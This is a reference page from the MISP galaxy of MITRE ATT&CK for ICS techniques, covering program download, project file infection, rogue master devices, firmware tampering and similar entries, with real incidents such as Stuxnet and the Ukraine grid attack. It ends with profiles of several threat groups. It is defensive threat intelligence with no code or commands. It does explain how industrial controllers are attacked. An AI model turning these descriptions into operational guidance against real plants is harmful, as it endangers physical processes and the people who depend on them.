Backdoor.Oldrea enumerates all OPC tags and queries for specific fields such as server state, tag name, type, access, and id[Backdoor.Oldrea enumerates all OPC tags and queries for specific fields such as server state, tag name, type, access, and id]
https://www.fireeye.com/blog/threat-research/2014/07/havex-its-down-with-opc.html

Program Download

Adversaries may perform a program download to load malicious or unintended program logic on a device as a method of persistence or to disrupt response functions or process control. Program download onto devices, such as PLCs, allows adversaries to implement custom logic. Malicious PLC programs may be used to disrupt physical processes or enable adversary persistence. The act of a program download will cause the PLC to enter a STOP operation state, which may prevent response functions from operating correctly.

The tag is: misp-galaxy:mitre-ics-techniques="Program Download"

Table 4425. Table References
Links
https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf
https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware

Program Organization Units

Program Organizational Units (POUs) are block structures used within PLC programming to create programs and projects. POUs can be used to hold user programs written in IEC 61131-3 languages: Structured text, Instruction list, Function block, and Ladder logic. They can also provide additional functionality, such as establishing connections between the PLC and other devices using TCON. Stuxnet uses a simple code-prepending infection technique to infect Organization Blocks (OB). For example, the following sequence of actions is performed when OB1 is infected: Increase the size of the original block. Write malicious code to the beginning of the block. Insert the original OB1 code after the malicious code.

The tag is: misp-galaxy:mitre-ics-techniques="Program Organization Units"

Table 4426. Table References
Links
Stuxnet infects PLCs with different code depending on the characteristics of the target system. An infection sequence consists of code blocks and data blocks that will be downloaded to the PLC to alter its behavior.[Stuxnet infects PLCs with different code depending on the characteristics of the target system. An infection sequence consists of code blocks and data blocks that will be downloaded to the PLC to alter its behavior.]
https://cdn.selinc.com/assets/Literature/Publications/Technical%20Papers/6560_PracticalApplications_MW_20120224_Web.pdf?v=20151125-003051
https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC-wp.pdf
https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf

Program Upload

Adversaries may attempt to upload a program from a PLC to gather information about an industrial process. Uploading a program may allow them to acquire and study the underlying logic. Methods of program upload include vendor software, which enables the user to upload and read a program running on a PLC. This software can be used to upload the target program to a workstation, jump box, or an interfacing device.

The tag is: misp-galaxy:mitre-ics-techniques="Program Upload"

Table 4427. Table References
Links
https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf

Project File Infection

Adversaries may attempt to infect project files with malicious code. These project files may consist of objects, program organization units, variables such as tags, documentation, and other configurations needed for PLC programs to function. Using built in functions of the engineering software, adversaries may be able to download an infected program to a PLC in the operating environment enabling further execution and persistence techniques. Adversaries may export their own code into project files with conditions to execute at specific intervals.3 Malicious programs allow adversaries control of all aspects of the process enabled by the PLC. Once the project file is downloaded to a PLC the workstation device may be disconnected with the infected project file still executing.

The tag is: misp-galaxy:mitre-ics-techniques="Project File Infection"

Table 4428. Table References
Links
https://infosys.beckhoff.com/english.php?content=../content/1033/tc3_sourcecontrol/18014398915785483.html&id=
http://www.plcdev.com/book/export/html/373
https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf

Remote File Copy

Adversaries may copy files from one system to another to stage adversary tools or other files over the course of an operation. Copying of files may also be performed laterally between internal victim systems to support Lateral Movement with remote Execution using inherent file sharing protocols such as file sharing over SMB to connected network shares. In control systems environments, malware may use SMB and other file sharing protocols to move laterally through industrial networks.

The tag is: misp-galaxy:mitre-ics-techniques="Remote File Copy"

Table 4429. Table References
Links
WannaCry can move laterally through industrial networks by means of the SMB service.[WannaCry can move laterally through industrial networks by means of the SMB service.]
https://dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/

Remote System Discovery

Remote System Discovery is the process of identifying the presence of hosts on a network1, and details about them. This process is common to network administrators validating the presence of machines and services, as well as adversaries mapping out a network for future-attack targets. An adversary may attempt to gain information about the target network via network enumeration techniques such as port scanning. One of the most popular tools for enumeration is Nmap. Remote System Discovery allows adversaries to map out hosts on the network as well as the TCP/IP ports that are open, closed, or filtered. Remote System Discovery tools also aid in by attempting to connect to the service and determine its exact version. The adversary may use this information to pick an exploit for a particular version if a known vulnerability exists.

The tag is: misp-galaxy:mitre-ics-techniques="Remote System Discovery"

Table 4430. Table References
Links
https://attack.mitre.org/wiki/Technique/T1018
https://pdfs.semanticscholar.org/18df/43ef1690b0fae15a36f770001160aefbc6c5.pdf
https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf
https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC-wp.pdf
https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf
https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%20-%20Safety%20System%20Targeted%20Malware%20%28Update%20B%29.pdf
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Replication Through Removable Media

Adversaries may move onto systems, such as those separated from the enterprise network, by copying malware to removable media which is inserted into the control systems environment. The adversary may rely on unknowing trusted third parties, such as suppliers or contractors with access privileges, to introduce the removable media. This technique enables initial access to target devices that never connect to untrusted networks, but are physically accessible. Operators of the German nuclear power plant, Gundremmingen, discovered malware on a facility computer not connected to the internet. The malware included Conficker and W32.Ramnit, which were also found on eighteen removable disk drives in the facility. The plant has since checked for infection and cleaned up more than 1,000 computers.9 An ESET researcher commented that internet disconnection does not guarantee system safety from infection or payload execution.

The tag is: misp-galaxy:mitre-ics-techniques="Replication Through Removable Media"

Table 4431. Table References
Links
https://www.kkw-gundremmingen.de/presse.php?id=571
Stuxnet was able to self-replicate by being spread through removable drives. A willing insider or unknown third party, such as a contractor, may have brought the removable media into the target environment.12 The earliest version of Stuxnet relied on physical installation, infecting target systems when an infected configuration file carried by a USB stick was opened.[Stuxnet was able to self-replicate by being spread through removable drives. A willing insider or unknown third party, such as a contractor, may have brought the removable media into the target environment.12 The earliest version of Stuxnet relied on physical installation, infecting target systems when an infected configuration file carried by a USB stick was opened.]
https://www.reuters.com/article/us-nuclearpower-cyber-germany/german-nuclear-plant-infected-with-computer-viruses-operator-says-idUSKCN0XN2OS
https://news.softpedia.com/news/on-chernobyl-s-30th-anniversary-malware-shuts-down-german-nuclear-power-plant-503429.shtml
https://www.sciencealert.com/multiple-computer-viruses-have-been-discovered-in-this-german-nuclear-plant
https://www.geek.com/apps/german-nuclear-plant-found-riddled-with-conficker-other-viruses-1653415/
https://arstechnica.com/information-technology/2016/04/german-nuclear-plants-fuel-rod-system-swarming-with-old-malware/
https://www.darkreading.com/endpoint/german-nuclear-power-plant-infected-with-malware/d/d-id/1325298
https://www.bbc.com/news/technology-36158606
https://www.welivesecurity.com/2016/04/28/malware-found-german-nuclear-power-plant/
https://support.symantec.com/us/en/article.tech93179.html
https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf
https://www.langner.com/wp-content/uploads/2017/03/to-kill-a-centrifuge.pdf

Rogue Master Device

Adversaries may setup a rogue master to leverage control server functions to communicate with slave devices. A rogue master device can be used to send legitimate control messages to other control system devices, affecting processes in unintended ways. It may also be used to disrupt network communications by capturing and receiving the network traffic meant for the actual master device. Impersonating a master device may also allow an adversary to avoid detection. In the Maroochy Attack, Vitek Boden falsified network addresses in order to send false data and instructions to pumping stations.

The tag is: misp-galaxy:mitre-ics-techniques="Rogue Master Device"

Table 4432. Table References
Links
https://www.mitre.org/sites/default/files/pdf/08_1145.pdf
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html
https://www.iad.gov/iad/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

Role Identification

Adversaries may perform role identification of devices involved with physical processes of interest in a target control system. Control systems devices often work in concert to control a physical process. Each device can have one or more roles that it performs within that control process. By collecting this role-based data, an adversary can construct a more targeted attack. For example, a power generation plant may have unique devices such as one that monitors power output of a generator and another that controls the speed of a turbine. Examining devices roles allows the adversary to observe how the two devices work together to monitor and control a physical process. Understanding the role of a target device can inform the adversary’s decision on what action to take, in order to cause Impact and influence or disrupt the integrity of operations. Furthermore, an adversary may be able to capture control system protocol traffic. By studying this traffic, the adversary may be able to determine which devices are outstations, and which are masters. Understanding of master devices and their role within control processes can enable the use of Rogue Master Device.

The tag is: misp-galaxy:mitre-ics-techniques="Role Identification"

Table 4433. Table References
Links
Ensure ICS and IT network cables are kept separate and that devices are locked up when possible, to reduce the likelihood they can be tampered with.[Ensure ICS and IT network cables are kept separate and that devices are locked up when possible, to reduce the likelihood they can be tampered with.]
https://www.f-secure.com/weblog/archives/00002718.html
https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Rootkit

Adversaries may deploy rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting and modifying operating-system API calls that supply system information. Rootkits or rootkit-enabling functionality may reside at the user or kernel level in the operating system, or lower. Firmware rootkits that affect the operating system yield nearly full control of the system. While firmware rootkits are normally developed for the main processing board, they can also be developed for I/O that can be attached to the asset. Compromise of this firmware allows the modification of all of the process variables and functions the module engages in. This may result in commands being disregarded and false information being fed to the main device. By tampering with device processes, an adversary may inhibit its expected response functions and possibly enable Impact.

The tag is: misp-galaxy:mitre-ics-techniques="Rootkit"

Table 4434. Table References
Links
https://attack.mitre.org/wiki/Technique/T1014
https://www.langner.com/wp-content/uploads/2017/03/to-kill-a-centrifuge.pdf
https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html
https://www.iad.gov/iad/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

Screen Capture

Adversaries may attempt to perform screen capture of devices in the control system environment. Screenshots may be taken of workstations, HMIs, or other devices that display environment-relevant process, device, reporting, alarm, or related data. These device displays may reveal information regarding the ICS process, layout, control, and related schematics. In particular, an HMI can provide a lot of important industrial process information. Analysis of screen captures may provide the adversary with an understanding of intended operations and interactions between critical devices.

The tag is: misp-galaxy:mitre-ics-techniques="Screen Capture"

Table 4435. Table References
Links
https://www.us-cert.gov/ncas/alerts/TA17-293A
https://dragos.com/resource/allanite/
https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html
https://www.symantec.com/security-center/writeup/2017-030708-4403-99

Scripting

Adversaries may use scripting languages to execute arbitrary code in the form of a pre-written script or in the form of user-supplied code to an interpreter. Scripting languages are programming languages that differ from compiled languages, in that scripting languages use an interpreter, instead of a compiler. These interpreters read and compile part of the source code just before it is executed, as opposed to compilers, which compile each and every line of code to an executable file. Scripting allows software developers to run their code on any system where the interpreter exists. This way, they can distribute one package, instead of precompiling executables for many different systems. Scripting languages, such as Python, have their interpreters shipped as a default with many Linux distributions. In addition to being a useful tool for developers and administrators, scripting language interpreters may be abused by the adversary to execute code in the target environment. Due to the nature of scripting languages, this allows for weaponized code to be deployed to a target easily, and leaves open the possibility of on-the-fly scripting to perform a task.

The tag is: misp-galaxy:mitre-ics-techniques="Scripting"

Table 4436. Table References
Links
https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage
https://dragos.com/resource/magnallium/
https://www.securityweek.com/researchers-analyze-tools-used-hexane-attackers-against-industrial-firms
https://www.bankinfosecurity.com/lyceum-apt-group-new-threat-to-oil-gas-companies-a-13003
https://unit42.paloaltonetworks.com/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/
https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%20-%20Safety%20System%20Targeted%20Malware%20%28Update%20B%29.pdf
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Serial Connection Enumeration

Adversaries may perform serial connection enumeration to gather situational awareness after gaining access to devices in the OT network. Control systems devices often communicate to each other via various types of serial communication mediums. These serial communications are used to facilitate informational communication, as well as commands. Serial Connection Enumeration differs from I/O Module Discovery, as I/O modules are auxiliary systems to the main system, and devices that are connected via serial connection are normally discrete systems. While IT and OT networks may work in tandem, the exact structure of the OT network may not be discernible from the IT network alone. After gaining access to a device on the OT network, an adversary may be able to enumerate the serial connections. From this perspective, the adversary can see the specific physical devices to which the compromised device is connected to. This gives the adversary greater situational awareness and can influence the actions that the adversary can take in an attack.

The tag is: misp-galaxy:mitre-ics-techniques="Serial Connection Enumeration"

Table 4437. Table References
Links
https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf
https://dragos.com/blog/crashoverride/CrashOverride-01.pdf
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Service Stop

Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services can inhibit or stop response to an incident or aid in the adversary’s overall objectives to cause damage to the environment. Services may not allow for modification of their data stores while running. Adversaries may stop services in order to conduct Data Destruction.

The tag is: misp-galaxy:mitre-ics-techniques="Service Stop"

Table 4438. Table References
Links
https://attack.mitre.org/techniques/T1489/
https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf
https://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/

Spearphishing Attachment

Adversaries may use a spearphishing attachment, a variant of spearphishing, as a form of a social engineering attack against specific targets. Spearphishing attachments are different from other forms of spearphishing in that they employ malware attached to an email. All forms of spearphishing are electronically delivered and target a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon User Execution to gain execution and access.

The tag is: misp-galaxy:mitre-ics-techniques="Spearphishing Attachment"

Table 4439. Table References
Links
https://attack.mitre.org/techniques/T1193/
https://www.eisac.com/public-news-detail?id=115909
https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html
https://www.wired.com/story/iran-hackers-us-phishing-tensions/
https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group
https://dragos.com/wp-content/uploads/Sample-WorldView-Report.pdf
https://dragos.com/wp-content/uploads/yir-ics-activity-groups-threat-landscape-2018.pdf
https://www.us-cert.gov/ncas/alerts/TA17-293A
https://dragos.com/resource/hexane/
https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
https://www.securityweek.com/five-threat-groups-target-industrial-systems-dragos
https://unit42.paloaltonetworks.com/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/
https://www.f-secure.com/weblog/archives/00002718.html
https://www.boozallen.com/content/dam/boozallen/documents/2016/09/ukraine-report-when-the-lights-went-out.pdf

Standard Application Layer Protocol

Adversaries may establish command and control capabilities over commonly used application layer protocols such as HTTP(S), OPC, RDP, telnet, DNP3, and modbus. These protocols may be used to disguise adversary actions as benign network traffic. Standard protocols may be seen on their associated port or in some cases over a non-standard port. Adversaries may use these protocols to reach out of the network for command and control, or in some cases to other infected devices within the network.

The tag is: misp-galaxy:mitre-ics-techniques="Standard Application Layer Protocol"

Table 4440. Table References
Links
https://dragos.com/resource/hexane/
https://unit42.paloaltonetworks.com/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/
https://www.boozallen.com/content/dam/boozallen/documents/2016/09/ukraine-report-when-the-lights-went-out.pdf
https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf

Supply Chain Compromise

Adversaries may perform supply chain compromise to gain control systems environment access by means of infected products, software, and workflows. Supply chain compromise is the manipulation of products, such as devices or software, or their delivery mechanisms before receipt by the end consumer. Adversary compromise of these products and mechanisms is done for the goal of data or system compromise, once infected products are introduced to the target environment. Supply chain compromise can occur at all stages of the supply chain, from manipulation of development tools and environments to manipulation of developed products and tools distribution mechanisms. This may involve the compromise and replacement of legitimate software and patches, such as on third party or vendor websites. Targeting of supply chain compromise can be done in attempts to infiltrate the environments of a specific audience. In control systems environments with assets in both the IT and OT networks, it is possible a supply chain compromise affecting the IT environment could enable further access to the OT environment. F-Secure Labs analyzed the approach the adversary used to compromise victim systems with Havex. The adversary planted trojanized software installers available on legitimate ICS/SCADA vendor websites. After being downloaded, this software infected the host computer with a Remote Access Trojan (RAT).

The tag is: misp-galaxy:mitre-ics-techniques="Supply Chain Compromise"

Table 4441. Table References
Links
https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group
https://dragos.com/wp-content/uploads/Dragos-Oil-and-Gas-Threat-Perspective-2019.pdf
https://www.f-secure.com/weblog/archives/00002718.html

System Firmware

System firmware on modern assets is often designed with an update feature. Older device firmware may be factory installed and require special reprograming equipment. When available, the firmware update feature enables vendors to remotely patch bugs and perform upgrades. Device firmware updates are often delegated to the user and may be done using a software update package. It may also be possible to perform this task over the network. An adversary may exploit the firmware update feature on accessible devices to upload malicious or out-of-date firmware. Malicious modification of device firmware may provide an adversary with root access to a device, given firmware is one of the lowest programming abstraction layers. In the 2015 attack on the Ukranian power grid, the adversaries gained access to the control networks of three different energy companies. The adversaries developed malicious firmware for the serial-to-ethernet devices which rendered them inoperable and severed connections between the control center and the substation.

The tag is: misp-galaxy:mitre-ics-techniques="System Firmware"

Table 4442. Table References
Links
http://www.sciencedirect.com/science/article/pii/S1874548213000231
https://ics.sans.org/media/E-ISAC_SANS_Ukraine_DUC_5.pdf
https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%20-%20Safety%20System%20Targeted%20Malware%20%28Update%20B%29.pdf
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Theft of Operational Information

Adversaries may steal operational information on a production environment as a direct mission outcome for personal gain or to inform future operations. This information may include design documents, schedules, rotational data, or similar artifacts that provide insight on operations. In the Bowman Dam incident, adversaries probed systems for operational data.

The tag is: misp-galaxy:mitre-ics-techniques="Theft of Operational Information"

Table 4443. Table References
Links
https://time.com/4270728/iran-cyber-attack-dam-fbi/
https://www.wsj.com/articles/iranian-hackers-infiltrated-new-york-dam-in-2013-1450662559
https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet.pdf
https://www.symantec.com/security-center/writeup/2012-052811-0308-99

Unauthorized Command Message

Adversaries may send unauthorized command messages to instruct control systems devices to perform actions outside their expected functionality for process control. Command messages are used in ICS networks to give direct instructions to control systems devices. If an adversary can send an unauthorized command message to a control system, then it can instruct the control systems device to perform an action outside the normal bounds of the device’s actions. An adversary could potentially instruct a control systems device to perform an action that will cause an Impact. In the Maroochy Attack, the adversary used a dedicated analog two-way radio system to send false data and instructions to pumping stations and the central computer. In the 2015 attack on the Ukranian power grid, the adversaries gained access to the control networks of three different energy companies. The adversaries used valid credentials to seize control of operator workstations and access a distribution management system (DMS) client application via a VPN. The adversaries used these tools to issue unauthorized commands to breakers at substations which caused a loss of power to over 225,000 customers over various areas.

The tag is: misp-galaxy:mitre-ics-techniques="Unauthorized Command Message"

Table 4444. Table References
Links
http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258
https://www.mitre.org/sites/default/files/pdf/08_1145.pdf
https://ics.sans.org/media/E-ISAC_SANS_Ukraine_DUC_5.pdf
https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf
https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf
https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

User Execution

Adversaries may rely on a targeted organizations’ user interaction for the execution of malicious code. User interaction may consist of installing applications, opening email attachments, or granting higher permissions to documents. Adversaries may embed malicious code or visual basic code into files such as Microsoft Word and Excel documents or software installers. Execution of this code requires that the user enable scripting or write access within the document. Embedded code may not always be noticeable to the user especially in cases of trojanized software

The tag is: misp-galaxy:mitre-ics-techniques="User Execution"

Table 4445. Table References
Links
https://www.boozallen.com/content/dam/boozallen/documents/2016/09/ukraine-report-when-the-lights-went-out.pdf
https://www.f-secure.com/weblog/archives/00002718.html
https://www.youtube.com/watch?v=eywmb7UDODY&feature=youtu.be&t=939
https://securelist.com/bad-rabbit-ransomware/82851/

Utilize/Change Operating Mode

Adversaries may place controllers into an alternate mode of operation to enable configuration setting changes for evasive code execution or to inhibit device functionality. Programmable controllers typically have several modes of operation. These modes can be broken down into three main categories: program run, program edit, and program write. Each of these modes puts the device in a state in which certain functions are available. For instance, the program edit mode allows alterations to be made to the user program while the device is still online. By driving a device into an alternate mode of operation, an adversary has the ability to change configuration settings in such a way to cause a Impact to equipment and/or industrial process associated with the targeted device. An adversary may also use this alternate mode to execute arbitrary code which could be used to evade defenses.

The tag is: misp-galaxy:mitre-ics-techniques="Utilize/Change Operating Mode"

Table 4446. Table References
Links
https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Valid Accounts

Adversaries may steal the credentials of a specific user or service account using credential access techniques. In some cases, default credentials for control system devices may be publicly available. Compromised credentials may be used to bypass access controls placed on various resources on hosts and within the network, and may even be used for persistent access to remote systems. Compromised and default credentials may also grant an adversary increased privilege to specific systems and devices or access to restricted areas of the network. Adversaries may choose not to use malware or tools, in conjunction with the legitimate access those credentials provide, to make it harder to detect their presence or to control devices and send legitimate commands in an unintended way. Adversaries may also create accounts, sometimes using predefined account names and passwords, to provide a means of backup access for persistence. The overlap of credentials and permissions across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) and possibly between the enterprise and operational technology environments. Adversaries may be able to leverage valid credentials from one system to gain access to another system. In the 2015 attack on the Ukranian power grid, the adversaries used valid credentials to interact directly with the client application of the distribution management system (DMS) server via a VPN and native remote access services to access employee workstations hosting HMI applications.2 The adversaries caused outages at three different energy companies, causing loss of power to over 225,000 customers over various areas.

The tag is: misp-galaxy:mitre-ics-techniques="Valid Accounts"

Table 4447. Table References
Links
https://www.boozallen.com/content/dam/boozallen/documents/2016/09/ukraine-report-when-the-lights-went-out.pdf
https://ics.sans.org/media/E-ISAC_SANS_Ukraine_DUC_5.pdf
https://dragos.com/resource/allanite/
https://dragos.com/resource/dymalloy/
https://www.us-cert.gov/ncas/alerts/TA17-293A
https://www.secureworks.com/blog/lyceum-takes-center-stage-in-middle-east-campaign
https://dragos.com/resource/chrysene/
https://dragos.com/resource/electrum/
https://dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf
https://dragos.com/blog/trisis/TRISIS-01.pdf
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Wireless Compromise

Adversaries may perform wireless compromise as a method of gaining communications and unauthorized access to a wireless network. Access to a wireless network may be gained through the compromise of a wireless device.12 Adversaries may also utilize radios and other wireless communication devices on the same frequency as the wireless network. Wireless compromise can be done as an initial access vector from a remote distance. A joint case study on the Maroochy Shire Water Services event examined the attack from a cyber security perspective.3 The adversary disrupted Maroochy Shire’s radio-controlled sewage system by driving around with stolen radio equipment and issuing commands with them. Boden used a two-way radio to communicate with and set the frequencies of Maroochy Shire’s repeater stations. A Polish student used a modified TV remote controller to gain access to and control over the Lodz city tram system in Poland. The remote controller device allowed the student to interface with the tram’s network to modify track settings and override operator control. The adversary may have accomplished this by aligning the controller to the frequency and amplitude of IR control protocol signals. The controller then enabled initial access to the network, allowing the capture and replay of tram signals

The tag is: misp-galaxy:mitre-ics-techniques="Wireless Compromise"

Table 4448. Table References
Links
https://www.blackhat.com/docs/us-14/materials/us-14-Bolshev-ICSCorsair-How-I-Will-PWN-Your-ERP-Through-4-20mA-Current-Loop-WP.pdf
https://www.slideshare.net/dgpeters/17-bolshev-1-13
https://www.mitre.org/sites/default/files/pdf/08_1145.pdf
https://www.londonreconnections.com/2017/hacked-cyber-security-railways/
https://inhomelandsecurity.com/teen_hacker_in_poland_plays_tr/
https://www.schneier.com/blog/archives/2008/01/hacking_the_pol.html

Intrusion Set

Name of ATT&CK Group.

Intrusion Set is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.

authors: MITRE

Ajax Security Team - G0130

[Ajax Security Team](https://attack.mitre.org/groups/G0130) is a group that has been active since at least 2010 and believed to be operating out of Iran. By 2014 [Ajax Security Team](https://attack.mitre.org/groups/G0130) transitioned from website defacement operations to malware-based cyber espionage campaigns targeting the US defense industrial base and Iranian users of anti-censorship technologies.(Citation: FireEye Operation Saffron Rose 2013)

The tag is: misp-galaxy:mitre-intrusion-set="Ajax Security Team - G0130"

Ajax Security Team - G0130 is also known as:

Ajax Security Team
Operation Woolen-Goldfish
AjaxTM
Rocket Kitten
Flying Kitten
Operation Saffron Rose

View relationships graph

Ajax Security Team - G0130 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing via Service - T1566.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="sqlmap - S0225" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Havij - S0224" with estimative-language:likelihood-probability="almost-certain"

Table 4449. Table References
Links
https://attack.mitre.org/groups/G0130
https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-operation-saffron-rose.pdf
https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf
https://documents.trendmicro.com/assets/wp/wp-operation-woolen-goldfish.pdf
https://iranthreats.github.io/resources/attribution-flying-rocket-kitten/
https://www.crowdstrike.com/blog/cat-scratch-fever-crowdstrike-tracks-newly-reported-iranian-actor-flying-kitten/

The White Company - G0089

[The White Company](https://attack.mitre.org/groups/G0089) is a likely state-sponsored threat actor with advanced capabilities. From 2017 through 2018, the group led an espionage campaign called Operation Shaheen targeting government and military organizations in Pakistan.(Citation: Cylance Shaheen Nov 2018)

The tag is: misp-galaxy:mitre-intrusion-set="The White Company - G0089"

The White Company - G0089 is also known as:

The White Company

View relationships graph

The White Company - G0089 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="NETWIRE - S0198" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Revenge RAT - S0379" with estimative-language:likelihood-probability="almost-certain"

Table 4450. Table References
Links
https://attack.mitre.org/groups/G0089
https://www.cylance.com/content/dam/cylance-web/en-us/resources/knowledge-center/resource-library/reports/WhiteCompanyOperationShaheenReport.pdf?_ga=2.161661948.1943296560.1555683782-1066572390.1555511517

Threat Group-3390 - G0027

[Threat Group-3390](https://attack.mitre.org/groups/G0027) is a Chinese threat group that has extensively used strategic Web compromises to target victims. (Citation: Dell TG-3390) The group has been active since at least 2010 and has targeted organizations in the aerospace, government, defense, technology, energy, and manufacturing sectors. (Citation: SecureWorks BRONZE UNION June 2017) (Citation: Securelist LuckyMouse June 2018)

The tag is: misp-galaxy:mitre-intrusion-set="Threat Group-3390 - G0027"

Threat Group-3390 - G0027 is also known as:

Threat Group-3390
TG-3390
Emissary Panda
BRONZE UNION
APT27
Iron Tiger
LuckyMouse

View relationships graph

Threat Group-3390 - G0027 has relationships with:

similar: misp-galaxy:threat-actor="EMISSARY PANDA" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="OwaAuth - S0072" with estimative-language:likelihood-probability="almost-certain"
